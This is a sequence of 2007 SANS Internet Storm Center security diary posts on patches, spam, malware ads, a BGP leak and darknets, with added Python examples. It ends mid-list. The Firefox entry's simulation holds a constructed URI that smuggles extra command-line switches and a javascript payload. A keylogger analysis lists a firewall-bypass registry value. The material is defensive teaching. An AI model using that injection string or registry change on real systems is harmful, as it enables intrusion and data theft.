  3. change the infocon. I am thinking about using the suffix "test" in our infocon.txt ( isc.sans.org/infocon.txt ) file.
  4. update the second story once all is back to normal.

So if you are triggering any notifications, be aware that this may happen. I will run the test around noon EDT. This is about the time when most of our readers are awake (Europe + US). It's probably better to do this during business hours than late at night. No need to wake up anybody with a pager alert.


0 Comments

Published: 2007-07-17

Reporting firewall logs

We got a couple of users forwarding firewall logs to the handlers\at/sans.org e-mail address. While we appreciate logs, malware and other reports like them, please don't send automated log reports to handlers\at/sans.org. If you do send logs, include some detail on why you consider them unusual.

Please use DShield for automated log reporting (see http://www.dshield.org/howto.html ). Our handlers have access to the DShield database and regularly check it for unusual activity.

Thanks!


0 Comments

Published: 2007-07-16

Symantec False-Positive on Filezilla, NASA World Wind

It appears that Symantec's anti-virus definitions (July 15th, rev 2) had a false positive on Filezilla and NASA World Wind, detecting them as Adware.cpush. The definition was fixed in the July 16th release. This isn't the first or last time false positives have shown up with anti-virus updates. As more and more malware gets developed, and deployment of that malware gets quicker, the strain on AV vendors to get definitions out quickly is intense. This makes it difficult to test against all software, especially the more esoteric variety. Test longer and allow more exploitation, or get the definition out fast and possibly have false positives or negatives? Not an easy question to answer (unless you tier definitions and customize updates so people can choose "stable" rules, "bleeding edge" rules, etc.).

However, this leads to an interesting discussion. Could hackers craft their malware such that the signatures tend to match safe files? This is already done in a sense: malware tries to appear as legitimate as possible on the network, and it also tries to avoid heuristic detection. For typical signature detection, however, this is not easy; it takes more than mindless polymorphism. Still, the incentive for malware writers is for their malware to stay undetected for as long as possible. That means more targeting to avoid the honeynets, more subtlety to avoid network detection, and more subtle executables to avoid AV software. Manipulating malware to maximize false positives could be an entertaining (and certainly painful) way to wreak havoc. Some basic research exists on this theory already, though nothing ready for market.


(Update: It appears a bunch of other software was caught up in this: Winamp, NSIS installers, etc. However, the latest definitions seem to be fine with that software as well.)

---

John Bambenek / bambenek (at) gmail (dot) com
University of Illinois

0 Comments

Published: 2007-07-15

Microsoft Patch support not Free?

We got reactions to some of our previous stories saying that, in reality, some of the patch support relating to the recently released patches was not being offered for free. We are assured by our Microsoft contacts that it is indeed intended to be free, and that they are willing to work with us to find out what went wrong.

So if you want to participate in a little study together with Microsoft, let us know what you tried that they (tried to) make you pay for, and include your contact details, such as telephone numbers, to be shared privately with our Microsoft contacts.

More anonymous reactions can go to the new poll, but we're looking for a few cases that are usable to find out where it goes wrong.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-13

Sunbelt Software Releases Patch for Ninja Email

Sunbelt Software has announced the availability of a patch to fix the problems that have occurred with the Ninja Email Software after installation of MS07-040 patch for .NET.   For more information about the problems with Ninja and to download the patch see:

sunbeltblog.blogspot.com/2007/07/sunbelt-developers-work-at-speed-of.html

0 Comments

Published: 2007-07-13

Symantec Backup Exec for Windows Server

An advisory has been issued by Symantec for their Backup Exec product. According to the advisory, a vulnerability exists in the RPC interface that may result in a heap overflow or denial of service on versions 10.x and 11.0 for Windows Servers.

seer.entsupport.symantec.com/docs/289731.htm

The advisory indicates that hotfixes are available at:  seer.entsupport.symantec.com/docs/289283.htm

The Common Vulnerabilities and Exposures (CVE) initiative has assigned CVE candidate CVE-2007-3509 to this issue. This issue is a candidate for inclusion in the CVE list (cve.mitre.org), which standardizes names for security problems.

To fully exploit this vulnerability the user must have administrative privileges. Again, another good reason to restrict user access whenever possible.


There is also an advisory from Secunia containing information about two vulnerabilities that exist in various Symantec products, including Internet Security and Brightmail. Again, to fully exploit them the user must have administrative privileges.

secunia.com/advisories/26053/

0 Comments

Published: 2007-07-13

Java Run Time Advisory Issued

According to an article online at ZDNet, there is yet another potential problem with Java.

news.zdnet.com/2100-1009_22-6196493.html


Australia's Computer Emergency Response Team analyst Robert Lowe warned that anyone using the Java Runtime Environment or Java Development Kit is at risk.

www.auscert.org.au/render.html

This flaw may have an impact on PDAs and mobile phones as well as PCs. Because Java is not tied to any one browser or platform, it has the potential to affect many, many devices. It is recommended that you patch all Java installations as soon as possible.


0 Comments

Published: 2007-07-13

Strange Round of EMails

We have received a number of reports from our readers indicating that they are receiving a large amount of pump-and-dump spam that contains no subject or body text. The emails do, however, contain attachments with a .dat extension. Upon further review of the attachments, it appears that they are failed attempts at creating and sending a .pdf file.

The attachments are the typical pharmacy scam spam. It is recommended that you just delete the emails. You may want to think about adding .dat to the banned file extensions in your anti-virus programs, at least until this round of spam has ended.

NOTE: Just a reminder, there are some applications that use the .dat extension on files for various reasons (Blackberry registration, Exchange servers). Be aware that if you block .dat attachments, you may also block valid emails. At this point the .dat attachment is not malicious, so you may just want to inform your users of the emails and tell them to delete them (and not open the attachment).

Thanks to our many readers that have offered insight into the uses for the .dat files.


0 Comments

Published: 2007-07-13

MS07-036 Revised

This patch was initially only for Office on Windows; however, some Mac users of Office may have noticed a patch being pushed down to them as well. Microsoft has revised the bulletin and detection logic.

MS07-036 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (936542)

"Summary: The bulletin was updated to include Microsoft Office 2004 for Mac and to indicate that the File Manifest information has been updated for Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007. The significance here is around the fact that when the bulletin was released there was no mention of Mac being affected despite the fact that bits were published to address the issue for them."

Mark - Shearwater

0 Comments

Published: 2007-07-12

MS07-040: .NET update trouble

It seems a number of readers are struggling with the MS07-040 patch for the .NET framework, mostly on clients from what we can tell.

The reports we have so far do not point to any one specific symptom; in many cases it is just various things going haywire. We really do appreciate the heads-up warnings we get from our readers, as they allow us to write little warnings like this one.

We'd like to offer two pieces of advice at this time:

  • If you run into trouble, do call Microsoft and open a case; it's the only way to get attention for the problem from those who know best how to fix it. It should be free. In the US, call 1-866-PCSAFETY; check their website for other countries. Support with patches should always be free.
  • Do read the relevant KB article for your specific combination of .NET framework version and OS; some of them were prepared in anticipation of certain problems. They are all linked from KB 931212.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-11

A patchy kind of day

Black Tuesday, Reboot Wednesday, "let's all distribute patches and vulnerability information Thursday". We might need to come up with a shorter name.

We often get links sent to us when vendors release new patches etc. We don't publish all of them; typically we let you know about the more important ones. However, this month there just seems to be a swag of patches from a range of vendors.

Microsoft had their usual bunch of patches, and Adobe had two which have already been mentioned. So here are some of the others:

Cisco

iDefense released information on Full Disclosure and Bugtraq (read more here)

Others mentioned today (so far): ClamAV, OpenOffice, more on Java, more on TippingPoint evasion, QuickTime (thanks Chris). We'll also add Symantec, iTunes and Juniper, and no doubt more.

In short it is a patchy kind of day, I'd be checking my list of core software and checking to see if I'm on the relevant notification list.  I'll also be checking if there are any non MSFT or Adobe patches I need to apply.

Mark

0 Comments

Published: 2007-07-11

Adobe patches

As if admins did not have enough to do on Reboot Wednesday, Adobe joined in the release of patches today:

APSB07-12 Flash Player: multiple vulnerabilities
  CVE-2007-3456
  CVE-2007-3457
  CVE-2007-2022

APSB07-13 Photoshop CS2 and CS3: multiple file format vulnerabilities (public exploits available)
  CVE-2007-2244
  CVE-2007-2365

Enjoy the patching!

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-10

WinPcap local privilege escalation

An exploit has been made public for a privilege escalation in WinPcap, a packet capture library used by many security tools.

Granted, most of the systems security professionals would run this on will typically not have many untrusted users, and as such will escape the worst of this. Still, a local escalation combined with a remote user-level exploit might be bad enough to get such security systems compromised.

Better be safe than sorry.

WinPcap version 4.0.1 should fix this.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-10

IE vs. FF

No, I'm not restarting the browser wars. They have been fought and lost.

Let's look at a recently published exploit though:

When Firefox installs on Windows, it installs itself as a URL handler. In pseudo code, the handler that is added looks like:

FIREFOX.EXE -option "%1"  -option

Now what happens if %1 contains a double quote?
Right, the attacker gets access to the command line.

So where does IE come into play against Firefox ?
Firefox seems to prevent access to the command line, but IE happily calls the URL handler and as such provides a path to the command line via the handler installed by Firefox.

As a result the IE user on a machine that has Firefox installed is at risk.

A workaround is to remove the URL handlers installed by Firefox from the registry. I'm sure the developers of Firefox can undo the damage done to systems in a subsequent patch.

This does go to show, however, that even unused but installed client programs might be a threat on your client system. Hence you need to take care of vulnerabilities in software that you don't even use.
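
To make the quoting problem concrete, here is an added Python simulation (not code from the diary, from Mozilla or from Microsoft). It substitutes a URI into the handler template above, once verbatim and once with the quote and whitespace characters percent-encoded first, and splits the result with a deliberately simplified model of Windows command-line parsing (double quotes group, unquoted spaces separate). The "-option" and "-chrome" switches and the firefoxurl:// URI are placeholders, and the exact characters Mozilla's fix escapes are not stated on the page.

```python
"""Simulation of the Firefox URL-handler quote problem.

Added example, not code from the ISC diary or from Mozilla.  It models how
a registered handler template of the form  FIREFOX.EXE -option "%1" -option
behaves when %1 is substituted verbatim, and what a hardened substitution
does instead.  The tokenizer is a simplified model of Windows command-line
splitting (quotes group, unquoted spaces separate); it is not the real
CommandLineToArgvW algorithm.
"""
from urllib.parse import quote

# Handler template as registered (pseudo code from the diary); the real
# option names are not on the page, so "-option" is kept as a placeholder.
HANDLER_TEMPLATE = 'FIREFOX.EXE -option "%1" -option'


def split_cmdline(cmdline: str) -> list:
    """Simplified Windows-style argv splitting: double quotes group words,
    unquoted whitespace separates arguments, and adjacent quoted/unquoted
    fragments join into one argument."""
    args, cur, in_quote, have_arg = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
            have_arg = True
        elif ch.isspace() and not in_quote:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
        else:
            cur.append(ch)
            have_arg = True
    if have_arg:
        args.append("".join(cur))
    return args


def build_vulnerable(uri: str) -> str:
    """Verbatim substitution: a double quote inside the URI closes the
    quoted %1 and lets the rest of the URI become new arguments."""
    return HANDLER_TEMPLATE.replace("%1", uri)


def build_hardened(uri: str) -> str:
    """Percent-encode the characters that can break out of the quoted
    argument before substituting.  Encoding '"' and whitespace is the
    minimum this template needs; the set Mozilla chose is an assumption."""
    safe = quote(uri, safe=":/?#[]@!$&'()*+,;=%-._~")
    return HANDLER_TEMPLATE.replace("%1", safe)


# Constructed attacker-controlled URI; "-chrome" is only a placeholder for
# whatever extra switch an attacker would want the browser to see.
EVIL_URI = 'firefoxurl://example.com" -chrome "javascript:alert(1)'


def argv_for(builder, uri: str = EVIL_URI) -> list:
    """argv the launched program would see for the given template builder."""
    return split_cmdline(builder(uri))


if __name__ == "__main__":
    print("vulnerable:", argv_for(build_vulnerable))
    print("hardened:  ", argv_for(build_hardened))
```

The vulnerable build yields six arguments with "-chrome" standing on its own, while the hardened build keeps the whole URI inside one argument. The real Windows parser has additional backslash rules, so treat this as a model of the failure, not a reimplementation.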

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-10

July 'Black Tuesday' overview

Overview of the July 2007 Microsoft patches and their status.

MS07-036 - Office (replaces MS07-023)
  Multiple vulnerabilities allow remote code execution with the rights of the logged on user.
  CVE-2007-1756, CVE-2007-3029, CVE-2007-3030
  Contra indications: KB 936542
  Known exploits: No known exploits
  Microsoft rating: Critical
  ISC rating(*): clients Critical, servers Important

MS07-037 - Publisher 2007
  Input validation failure allows remote code execution with the rights of the logged on user.
  CVE-2007-1754
  Contra indications: KB 936548
  Known exploits: No known exploits
  Microsoft rating: Important
  ISC rating(*): clients Critical(***), servers Important

MS07-038 - Vista
  Teredo interfaces bypass certain firewall rules, leading to exposure of the system's interfaces and bypass of the perimeter defenses due to the tunneling.
  CVE-2007-3038
  Contra indications: KB 935807
  Known exploits: No known exploits
  Microsoft rating: Moderate
  ISC rating(*): clients Critical, servers Critical(**)

MS07-039 - Active Directory servers
  Multiple input validation failures allow remote code execution and DoS.
  CVE-2007-3028, CVE-2007-0040
  Contra indications: KB 926122
  Known exploits: No known exploits
  Microsoft rating: Critical
  ISC rating(*): clients Important(**), servers Critical

MS07-040 - .NET framework (replaces MS05-004)
  Multiple vulnerabilities allow remote code execution on clients and information disclosure on servers.
  CVE-2007-0041, CVE-2007-0042, CVE-2007-0043
  Contra indications: KB 931212
  Known exploits: No known exploits
  Microsoft rating: Critical
  ISC rating(*): clients Critical, servers Critical

MS07-041 - IIS 5.1 (web server on Windows XP)
  Buffer overflow allows remote code execution with system level privileges.
  CVE-2005-4360
  Contra indications: KB 939373
  Known exploits: DoS exploit public since 2005
  Microsoft rating: Important
  ISC rating(*): clients Critical(***), servers Critical(***)


We will update issues on this page as they evolve.
We appreciate updates.
US-based customers can call Microsoft for free patch-related support on 1-866-PCSAFETY.
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): in the event Vista based machines are used as a server, or in the unlikely event Active Directory Services are running on machines used as clients.

(***):If installed.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-09

The ever morphing Storm

Readers have been reporting emails with subjects such as:

  • Spyware Detected!
  • Malware Alert!
  • Virus Detected!

The Storm virus from the last week or so (greeting cards) has morphed into this new version. Nothing new: the text has changed somewhat and the subject line is different. By and large it is still the same attempt to get people to download an exe file.

AusCERT has put out an alert on this, as there has been an increase in these messages in the region.

As usual, discourage users from blindly clicking links in emails. Educate them on your corporate AV and AS practices so they will know that the message is not legit, and even if you do block all of these messages, raise awareness with staff so they don't fall for these types of messages at home. Blocking downloads of exe files is also a good start.

A reader suggested a few keywords and phrases that could be used to identify the messages: the phrase "robotaccount will be blocked", and the word "epidemic" near the word "worm".


Cheers

Mark H - Shearwater

0 Comments

Published: 2007-07-08

Evil Google Ads

Robert sent us some nice analysis earlier today about some hostile ads he discovered at Google.  As best we can tell they are gone now, but here are his findings.

Searching for some free templates at Google may bring you nasty things you won't want:

http://www.google.com/search?hl=en&q=kostenlose+vorlagen&btnG=Google+Search

Have a look at the first advertising link "Kostenlos-Vorlagen.info"

All files there (all the same) are detected as:
AntiVir 7.4.0.39 07.07.2007 TR/Spy.BZub.JD.1
F-Secure 6.70.13260.0 07.07.2007 W32/Malware
Ikarus T3.1.1.8 07.07.2007 Trojan-Spy.Win32.Goldun.lw
Kaspersky 4.0.2.24 07.07.2007 Trojan-Spy.Win32.BZub.jd
Microsoft 1.2704 07.07.2007 TrojanDropper:Win32/Small.OT
Norman 5.80.02 07.06.2007 W32/Malware
Sophos 4.19.0 07.06.2007 Mal/Binder-C
Webwasher-Gateway 6.0.1 07.07.2007 Trojan.Spy.BZub.JD.1
After executing, the malware drops a file named:
C:\WINDOWS\System32\ipv6monl.dll
It hooks as a BHO under CLSID:
HKEY_CLASSES_ROOT\CLSID\{36DBC179-A19F-48F2-B16A-6A3E19B42A87}\InprocServer32
To do so it looks for activated browser extensions:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main "Enable Browser Extensions" = yes
It also ensures that IE can bypass the Windows Firewall:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Program Files\Internet Explorer\IEXPLORE.EXE" = C:\Program Files\Internet Explorer\IEXPLORE.EXE:*:Enabled:Internet Explorer
The keylogger function checks for banking logins and, if recognized, logs this information and sends it to a server.

Thanks, Robert!  Great job of analysis.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-07-08

Yahoo Follow-up

On Friday we reported that there were connectivity issues with Yahoo. Initially, based on emails we received, we thought that it was a problem either at Yahoo or perhaps inside Verizon's network. Later we determined that it was not Verizon or Yahoo, but more likely an issue at Level3. Yahoo's official response is here.

The first indication we got that the problem was at Level3 was from a post to the NANOG mailing list showing the output of a traceroute to Yahoo.  Here are the last few hops, notice the latency at and beyond Level3:

 13     *       70 ms    77 ms  ge-0-3-0-69.bbr2.sanjose1.level3.net [4.68.18.2]
 14     *       78 ms    71 ms  so-14-0.hsa4.sanjose1.level3.net [4.68.114.158]
 15   487 ms   449 ms   459 ms  hanaro.hsa4.level3.net [4.79.60.22]
 16     *        *        *     Request timed out.
 17     *        *        *     Request timed out.
 18     *      586 ms     *     te-8-1.bas-a2.sp1.yahoo.com [209.131.32.19]
 19     *      570 ms     *     f1.www.vip.sp1.yahoo.com [209.131.36.158]
 20     *        *      591 ms  f1.www.vip.sp1.yahoo.com [209.131.36.158]

Later, one of our readers found that a BGP peer of Level3 was advertising itself as the best path via San Jose for a large number of routes.  The advertisement came from AS9318 (Hanaro Telecom) and caused Yahoo and many other sites that were reached via Level3 to be unavailable for a period of about an hour.  As an example, that reader did a route lookup for www.merit.edu (host of the NANOG mailing list) to show that it wasn't just Yahoo that was affected.  Here is the output provided to the Internet Storm Center:

BGP routing table entry for 198.108.0.0/14 
Bestpath Modifiers: deterministic-med
Paths: (2 available, best #1)
  Not advertised to any peer
  9318 9318 11164 237, (aggregated by 237 lo0x0.2.nl-chi3.mich.net)
  AS-path translation: { APNIC-AS-3-BLOCK APNIC-AS-3-BLOCK WILLINET NSFNETTEST14 }
    lo-22.hsa4.SanJose1 (metric 161) from lo-22.err1.SanJose1 (lo-22.err1.SanJose1)
      Origin IGP, metric 0, localpref 100, valid, internal, atomic-aggregate, best
      Community: North_America  Lclprf_100 Level3_Customer United_States San_Jose
      Originator: hsa4.SanJose1
  9318 9318 11164 237, (aggregated by 237 lo0x0.2.nl-chi3.mich.net)
  AS-path translation: { APNIC-AS-3-BLOCK APNIC-AS-3-BLOCK WILLINET NSFNETTEST14 }
    lo-22.hsa4.SanJose1 (metric 161) from lo-22.err2.SanJose1 (lo-22.err2.SanJose1)
      Origin IGP, metric 0, localpref 100, valid, internal, atomic-aggregate
      Community: North_America  Lclprf_100 Level3_Customer United_States San_Jose
      Originator: hsa4.SanJose1

If the same query is done now, here is what Level3's looking glass service says for www.merit.edu via San Jose:

BGP routing table entry for 198.108.0.0/14
Bestpath Modifiers: deterministic-med
Paths: (2 available, best #2)
Not advertised to any peer
7911 237 237 237 237
AS-path translation: { WCG NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 }
lo-22.car4.SanJose1 (metric 141) from lo-22.err2.SanJose1 (lo-22.err2.SanJose1)
Origin IGP, metric 0, localpref 100, valid, internal
Community: North_America Lclprf_100 Level3_Customer United_States San_Jose 7911:777 7911:7705
Originator: car4.SanJose1
7911 237 237 237 237
AS-path translation: { WCG NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 }
lo-22.car4.SanJose1 (metric 141) from lo-22.err1.SanJose1 (lo-22.err1.SanJose1)
Origin IGP, metric 0, localpref 100, valid, internal, best
Community: North_America Lclprf_100 Level3_Customer United_States San_Jose 7911:777 7911:7705
Originator: car4.SanJose1


Over at Netcraft, you can see the brief outage by observing the red area on the bottom-right side of this status graphic:

So, bottom line: it wasn't Yahoo having the problems. It was a BGP routing issue that affected reachability of many sites that had routes advertised through Level3. Unfortunately this is one of the Internet's "dirty little secrets": BGP updates are the lifeblood of the Internet, yet there are many ways these route advertisements can fail. There have been many suggestions for improvement (see the soBGP and S-BGP projects) and even the US Department of Homeland Security has tried to get some traction in making improvements to the routing infrastructure. But the Internet remains vulnerable to these types of configuration errors and intentional false routing advertisements.
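
As an added example (not from the diary), the Python below parses looking-glass entries in the format shown above and flags paths whose origin AS or first-hop neighbour differs from a baseline. The two entries are the page's own output; the baseline (AS237 as origin, AS7911 as Level3's neighbour) is read off the post-incident entry and is an assumption of the example, not something Level3 published.

```python
"""Spotting a route leak in Cisco-style looking-glass output.

Added example, not code from the ISC diary.  The two BGP entries below are
copied from the page; the baseline used in audit() is an assumption.
"""
import re
from dataclasses import dataclass

# AS path line: a run of AS numbers, optionally followed by ", (aggregated by ...)".
AS_PATH_RE = re.compile(r"^(\d+(?: \d+)*)(?:,.*)?$")


@dataclass
class Path:
    as_path: list          # left = Level3's neighbour, right = originating AS
    best: bool = False


def parse_paths(lg_output: str) -> list:
    """Pull the AS paths out of a 'show ip bgp <prefix>' entry and mark the
    one the router selected as best (the 'best' attribute on the Origin line)."""
    paths, current = [], None
    for raw in lg_output.splitlines():
        line = raw.strip()
        m = AS_PATH_RE.match(line)
        if m:
            current = Path([int(a) for a in m.group(1).split()])
            paths.append(current)
        elif line.startswith("Origin ") and current is not None:
            attrs = [a.strip() for a in line.split(",")]
            current.best = "best" in attrs
    return paths


def as_path_len(path: Path) -> int:
    """AS-path length as best-path selection counts it: prepends still count,
    so 7911 237 237 237 237 is length 5."""
    return len(path.as_path)


def audit(lg_output: str, expected_origin: int, expected_neighbors: set) -> list:
    """Findings for each path whose origin or first-hop neighbour differs from
    the baseline.  Findings tagged [BEST] are the ones that moved traffic."""
    findings = []
    for p in parse_paths(lg_output):
        tag = " [BEST]" if p.best else ""
        origin, neighbor = p.as_path[-1], p.as_path[0]
        if origin != expected_origin:
            findings.append(f"origin AS{origin} != AS{expected_origin}{tag}: {p.as_path}")
        if neighbor not in expected_neighbors:
            findings.append(f"unexpected transit AS{neighbor}{tag}: {p.as_path}")
    return findings


# Looking-glass output during the incident (copied from the page).
LEAK = """\
BGP routing table entry for 198.108.0.0/14
Bestpath Modifiers: deterministic-med
Paths: (2 available, best #1)
  Not advertised to any peer
  9318 9318 11164 237, (aggregated by 237 lo0x0.2.nl-chi3.mich.net)
  AS-path translation: { APNIC-AS-3-BLOCK APNIC-AS-3-BLOCK WILLINET NSFNETTEST14 }
    lo-22.hsa4.SanJose1 (metric 161) from lo-22.err1.SanJose1 (lo-22.err1.SanJose1)
      Origin IGP, metric 0, localpref 100, valid, internal, atomic-aggregate, best
      Community: North_America  Lclprf_100 Level3_Customer United_States San_Jose
      Originator: hsa4.SanJose1
  9318 9318 11164 237, (aggregated by 237 lo0x0.2.nl-chi3.mich.net)
  AS-path translation: { APNIC-AS-3-BLOCK APNIC-AS-3-BLOCK WILLINET NSFNETTEST14 }
    lo-22.hsa4.SanJose1 (metric 161) from lo-22.err2.SanJose1 (lo-22.err2.SanJose1)
      Origin IGP, metric 0, localpref 100, valid, internal, atomic-aggregate
      Community: North_America  Lclprf_100 Level3_Customer United_States San_Jose
      Originator: hsa4.SanJose1
"""

# Looking-glass output after the incident (copied from the page).
NORMAL = """\
BGP routing table entry for 198.108.0.0/14
Bestpath Modifiers: deterministic-med
Paths: (2 available, best #2)
Not advertised to any peer
7911 237 237 237 237
AS-path translation: { WCG NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 }
lo-22.car4.SanJose1 (metric 141) from lo-22.err2.SanJose1 (lo-22.err2.SanJose1)
Origin IGP, metric 0, localpref 100, valid, internal
Community: North_America Lclprf_100 Level3_Customer United_States San_Jose 7911:777 7911:7705
Originator: car4.SanJose1
7911 237 237 237 237
AS-path translation: { WCG NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 NSFNETTEST14 }
lo-22.car4.SanJose1 (metric 141) from lo-22.err1.SanJose1 (lo-22.err1.SanJose1)
Origin IGP, metric 0, localpref 100, valid, internal, best
Community: North_America Lclprf_100 Level3_Customer United_States San_Jose 7911:777 7911:7705
Originator: car4.SanJose1
"""

if __name__ == "__main__":
    for finding in audit(LEAK, expected_origin=237, expected_neighbors={7911}):
        print(finding)
    print("after:", audit(NORMAL, 237, {7911}) or "no findings")
```

Both paths carry localpref 100, so AS-path length decides: the leaked 9318 9318 11164 237 path is four hops, while Merit's own prepended 7911 237 237 237 237 path is five, which is how a leak can win best-path selection without ever touching the origin AS.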

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-07-08

Fun with Darknets

When I write Darknet, I mean "a portion of routed, allocated IP space in which no active services or servers reside" not "a private virtual network where users connect only to people they trust."

Every environment is different, so you need to use the architecture to your advantage when placing your darknet sensors. At one of my clients they have a unique fully proxied environment where the desktops do not have direct outbound access to the Internet, and all non-proxied Internet-bound traffic ends up on their core routers, where it times out. By placing a sensor in this loop I can capture all of the traffic initiated from internal clients that is trying to get out to the Internet but is not properly proxied. This means that I see a lot of misconfigured traffic, but it also means I see all of the botnets trying to phone home.

In its initial stages I only had argus and p0f running on the sensor. The drive would fill up within a week because of the huge amount of misconfigured traffic that was landing on the core routers, traffic that served no purpose but to die. This type of traffic was caused by typos in syslog configs which sent firewall logs off to never-never land, BOOTP requests intended for decommissioned servers, things of that nature. After many weeks of working with the operations teams we cleared up a lot of the wasted traffic and can now collect full-packet captures via snort for additional analysis.

An external sensor was placed to listen for traffic intended for an internal-only block of IPs. On this sensor we see what scans are targeting our neighborhood of the Internet, and backscatter from attacks that spoof our IP space (for some reason, I only see the APAC region targeted this way).

I've found that no single tool provides all of the information that I need. Argus, with its assumptions about flows, doesn't always render backscatter properly, and it's difficult to tell whether a scan is targeting our network or whether our IP was spoofed to disguise a scan on another network. Other times, full-packet captures are overkill and p0f logs are all I need to see whether a particular scan hit us or not. No single tool satisfies our requirements (no surprise there). I'm still thinking about what I want to use to synthesize all of these data sources into a more complete picture.

As a next step, I'm looking into running snort with a very stripped-down rule set (due to the nature of the darknet, content-based rules are all but useless) to immediately notify our security staff of suspected internal infections (e.g. a SYN sent to establish an IRC connection to a known-malicious host), and adding some visualization via afterglow to see if that adds any capabilities for the analyst.

The darknet has been very useful in confirming reports sent to the handlers. It's paid for itself by helping clean up misconfigured systems and aiding in locating unmanaged infected systems on our network. Darknets are also much safer and easier to justify to management than honeypots. So if you're looking for something fun to do at work, give a darknet a thought.
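
As an added example (not Kevin's code), the following Python applies the sensor logic described above to a constructed capture: packets addressed to the unused block seen by the external sensor are split into scans (inbound SYN) and backscatter (inbound SYN-ACK or RST to a host that never sent a SYN), and client traffic that died on the core routers is split into suspected phone-home attempts (SYN to an IRC port or to a known-bad host) and plain misconfiguration (syslog, BOOTP). The address ranges, the known-bad host and the packet records are all constructed for the demo.

```python
"""Classifying what lands on internal and external darknet sensors.

Added example, not code from the ISC diary.  Addresses are documentation
ranges, the known-bad host and the packet records are constructed, and the
rules are the ones the diary describes.
"""
import ipaddress
from collections import Counter, defaultdict
from dataclasses import dataclass

# Constructed network layout.
DARKNET = ipaddress.ip_network("198.51.100.0/24")   # unused, externally routed block
INTERNAL = ipaddress.ip_network("10.0.0.0/8")       # client space behind the proxies
IRC_PORTS = {6667, 6668, 6669}
KNOWN_BAD = {ipaddress.ip_address("203.0.113.66")}  # assumed C2 host from a report
MISCONFIG_UDP = {67: "bootp", 514: "syslog"}        # traffic that only exists to die


@dataclass(frozen=True)
class Pkt:
    src: str
    dst: str
    proto: str        # "tcp" or "udp"
    dport: int
    flags: str = ""   # TCP flags in tcpdump style: "S", "SA", "R", "RA"


def classify(p: Pkt) -> str:
    src, dst = ipaddress.ip_address(p.src), ipaddress.ip_address(p.dst)
    # External sensor: nothing lives in the darknet, so every packet is unsolicited.
    if dst in DARKNET:
        if p.proto == "tcp" and p.flags == "S":
            return "inbound-scan"
        if p.proto == "tcp" and p.flags in ("SA", "R", "RA"):
            return "backscatter"   # reply to a SYN we never sent: our address was spoofed
        return "inbound-other"
    # Internal sensor: client traffic that bypassed the proxy and died on the core.
    if src in INTERNAL and dst not in INTERNAL:
        if p.proto == "tcp" and p.flags == "S" and (p.dport in IRC_PORTS or dst in KNOWN_BAD):
            return "suspect-phone-home"
        if p.proto == "udp" and p.dport in MISCONFIG_UDP:
            return "misconfig-" + MISCONFIG_UDP[p.dport]
        return "unproxied-other"
    return "unclassified"


def summarize(pkts) -> Counter:
    return Counter(classify(p) for p in pkts)


def scan_sources(pkts, min_targets: int = 3) -> set:
    """Sources that SYN-scanned at least min_targets distinct darknet addresses."""
    targets = defaultdict(set)
    for p in pkts:
        if classify(p) == "inbound-scan":
            targets[p.src].add(p.dst)
    return {s for s, t in targets.items() if len(t) >= min_targets}


def spoofed_addresses(pkts, min_victims: int = 2) -> set:
    """Darknet addresses receiving backscatter from several different hosts:
    someone is forging them as source addresses in an attack on those hosts."""
    victims = defaultdict(set)
    for p in pkts:
        if classify(p) == "backscatter":
            victims[p.dst].add(p.src)
    return {d for d, v in victims.items() if len(v) >= min_victims}


def phone_home_clients(pkts) -> list:
    return sorted({p.src for p in pkts if classify(p) == "suspect-phone-home"})


# Constructed sample capture: one scanner, one spoofed darknet address,
# two suspect clients, two misconfigured hosts and one stray web request.
SAMPLE = [
    Pkt("192.0.2.10", "198.51.100.1", "tcp", 445, "S"),
    Pkt("192.0.2.10", "198.51.100.2", "tcp", 445, "S"),
    Pkt("192.0.2.10", "198.51.100.3", "tcp", 445, "S"),
    Pkt("203.0.113.80", "198.51.100.7", "tcp", 1025, "SA"),
    Pkt("203.0.113.81", "198.51.100.7", "tcp", 1026, "RA"),
    Pkt("203.0.113.82", "198.51.100.7", "tcp", 1027, "SA"),
    Pkt("10.1.2.3", "203.0.113.66", "tcp", 6667, "S"),
    Pkt("10.1.2.4", "203.0.113.200", "tcp", 6668, "S"),
    Pkt("10.1.9.9", "203.0.113.5", "udp", 514),
    Pkt("10.1.9.10", "203.0.113.5", "udp", 67),
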